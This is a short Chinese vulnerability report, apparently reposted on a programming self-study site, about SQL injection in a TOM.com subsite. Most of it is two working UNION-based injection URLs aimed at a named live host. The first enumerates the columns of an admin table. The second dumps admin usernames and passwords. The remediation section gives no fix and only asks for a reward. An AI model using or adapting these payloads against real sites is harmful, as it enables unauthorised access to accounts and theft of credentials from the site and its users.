漏洞 证明: http://dgbest.tom.com/special_issue.php?id=-37 union select group_concat(column_name) from information_schema.columns where table_name=0x6467626573745F61646D696E-- http://dgbest.tom.com/special_issue.php?id=-37 union select (select concat(group_concat(user_login,0x20,user_pass))) from dgbest_admin-- 修复方案: 求礼物 谢谢 作者 咸鱼
查看更多关于TOM分站存在注入漏洞可手工爆帐号跟密码 - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12081